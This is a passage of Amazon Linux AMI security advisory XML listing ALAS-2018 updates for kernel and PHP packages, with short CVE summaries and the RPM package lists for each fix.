arch="i686"><filename>Packages/mod24_perl-devel-2.0.7-7.20.amzn1.i686.rpm</filename></package><package name="mod24_perl-debuginfo" version="2.0.7" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_perl-debuginfo-2.0.7-7.20.amzn1.i686.rpm</filename></package><package name="mod_perl" version="2.0.7" release="7.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_perl-2.0.7-7.28.amzn1.x86_64.rpm</filename></package><package name="mod_perl-debuginfo" version="2.0.7" release="7.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_perl-debuginfo-2.0.7-7.28.amzn1.x86_64.rpm</filename></package><package name="mod_perl-devel" version="2.0.7" release="7.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_perl-devel-2.0.7-7.28.amzn1.x86_64.rpm</filename></package><package name="mod_perl-debuginfo" version="2.0.7" release="7.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_perl-debuginfo-2.0.7-7.28.amzn1.i686.rpm</filename></package><package name="mod_perl-devel" version="2.0.7" release="7.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_perl-devel-2.0.7-7.28.amzn1.i686.rpm</filename></package><package name="mod_perl" version="2.0.7" release="7.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_perl-2.0.7-7.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1086</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1086: important priority package update for kernel</title><issued date="2018-10-03 02:57:00" /><updated date="2020-06-03 18:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20856:
An issue was discovered in the Linux kernel before 4.18.7. In block/blk-core.c, there is an __blk_drain_queue() use-after-free because a certain error case is mishandled.
1738705: CVE-2018-20856 kernel: Use-after-free in __blk_drain_queue() function in block/blk-core.c
CVE-2018-17182:
A security flaw was discovered in the Linux kernel. The vmacache_flush_all() function in mm/vmacache.c mishandles sequence number overflows. An attacker can trigger a use-after-free (and possibly gain privileges) via certain thread creation, map, unmap, invalidation, and dereference operations.
1631205:
CVE-2018-17182 kernel: Use-after-free in the vmacache_flush_all function resulting in a possible privilege escalation
CVE-2018-16658:
An information leak was discovered in the Linux kernel in cdrom_ioctl_drive_status() function in drivers/cdrom/cdrom.c that could be used by local attackers to read kernel memory at certain location.
1627731:
CVE-2018-16658 kernel: Information leak in cdrom_ioctl_drive_status
CVE-2018-14633:
A security flaw was found in the chap_server_compute_md5() function in the ISCSI target code in the Linux kernel in a way an authentication request from an ISCSI initiator is processed. An unauthenticated remote attacker can cause a stack buffer overflow and smash up to 17 bytes of the stack. The attack requires the iSCSI target to be enabled on the victim host. Depending on how the target&#039;s code was built (i.e. depending on a compiler, compile flags and hardware architecture) an attack may lead to a system crash and thus to a denial-of-service or possibly to a non-authorized access to data exported by an iSCSI target. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is highly unlikely.
A security flaw was found in the chap_server_compute_md5() function in the ISCSI target code in the Linux kernel in a way an authentication request from an ISCSI initiator is processed. An unauthenticated remote attacker can cause a stack buffer overflow and smash up to 17 bytes of the stack. The attack requires the iSCSI target to be enabled on the victim host. Depending on how the target&#039;s code was built (i.e. depending on a compiler, compile flags and hardware architecture) an attack may lead to a system crash and thus to a denial of service or possibly to a non-authorized access to data exported by an iSCSI target. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is highly unlikely.
1626035:
CVE-2018-14633 kernel: stack-based buffer overflow in chap_server_compute_md5() in iscsi target
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14633" title="" id="CVE-2018-14633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16658" title="" id="CVE-2018-16658" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17182" title="" id="CVE-2018-17182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20856" title="" id="CVE-2018-20856" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.72-68.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1087</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1087: important priority package update for kernel</title><issued date="2018-10-03 19:23:00" /><updated date="2018-10-04 22:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14634:
An integer overflow flaw was found in the Linux kernel&#039;s create_elf_tables() function. An unprivileged local user with access to SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system.
1624498:
CVE-2018-14634 kernel: Integer overflow in Linux's create_elf_tables function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14634" title="" id="CVE-2018-14634" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.26-46.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1090</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1090: medium priority package update for php56 php70 php71 php72</title><issued date="2018-10-17 21:56:00" /><updated date="2018-10-18 22:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-17082:
The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a &quot;Transfer-Encoding: chunked&quot; request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.
1629552:
CVE-2018-17082 php: Cross-site scripting (XSS) flaw in Apache2 component via body of 'Transfer-Encoding: chunked' request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17082" title="" id="CVE-2018-17082" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-recode" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.23" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.23-1.34.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.23" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.23-1.34.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.23" 